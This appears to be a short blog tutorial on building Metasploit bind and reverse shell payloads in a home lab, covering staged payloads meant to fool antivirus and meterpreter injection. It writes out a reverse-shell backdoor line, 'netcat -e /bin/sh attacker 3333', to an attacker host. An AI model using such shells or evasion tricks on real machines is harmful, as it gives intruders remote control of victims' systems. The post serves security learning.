bind --> we attack victim (usual way)
reverse --> victim unconsciously contacted attacker (wow....)
Next, how to do them?? Lets we practice on our LAB
1. Open terminal and write msfpayload command and we should see like this:
option -h is the same result when we do msfpayload command
option -l give us all list of pay load we can use. For complete information we can read from this .
- Bind listening on port payload of our victims we shall attack while the reverse payload, we are opening the port to accept connections from the victim. Another options are just the different protocol ,ipv6 or ipv4 or transport layer (tcp, udp) or aplication (http etc.).
- Staged payload means there are several payload to executed, initial payload is usually smaller in size that is used as a way to execute the next payload. Stage payload type is usually used to deceive anti-virus . The usual payload is the same as we execute a backdoor eg "netcat-e / bin / sh attacker 3333" for the reverse connection.
- While for meterpreter & vnc, we inject the library using vnc or meterpreter server and run it from memory.
The different is with vnc if we can get the graphic display of the victim's computer,while if meterpreter its more assortment & powerful payload.
- Injection method itself usually using utility from windows loader and some reflective .dll injection techniques using reflective loader to load the library in memory of the host process and execute.
Okay, enough for theory..^^, now practicing..
1. Make bind shell payload
now go to /tmp directory and copy bind.exe file to our LAB, run it right now and write this command on cmd windows.
it means port 4444 opened, now we ready to use netcat on our BT.
done......we inside windows system.
2. Make reverse shell payload
now go to /tmp directory and copy reverse.exe file to our LAB and run netcat to listen to port 4444, then run reverse.exe from LAB. The result should like this.
Done ^^, and to be continued...
Tidak ada komentar:
Posting Komentar